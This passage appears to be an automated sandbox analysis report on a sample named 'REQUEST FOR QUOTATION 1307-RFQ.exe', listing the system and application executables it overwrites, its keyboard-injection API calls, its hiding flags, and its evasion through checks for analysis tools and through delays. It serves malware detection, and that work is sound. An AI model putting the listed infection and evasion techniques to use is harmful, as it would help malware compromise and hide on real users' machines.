              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00B0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B0CBD0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 7_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_009952A0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 8_2_01ED52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 8_2_01ED52A0
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 10_2_00B852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 10_2_00B852A0
              Source: C:\Windows\System32\Spectrum.exeCode function: 15_2_005452A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 15_2_005452A0
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 17_2_00D152A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 17_2_00D152A0
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeAPI/Special instruction interceptor: Address: C9328C
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEO
              Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1684737431.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERG
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598514Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597858Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597749Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597569Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597268Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597148Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596141Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595042Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594932Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594652Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594545Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594423Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7405Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2434Jump to behavior
              Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 494Jump to behavior
              Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 7345
              Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 2653
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
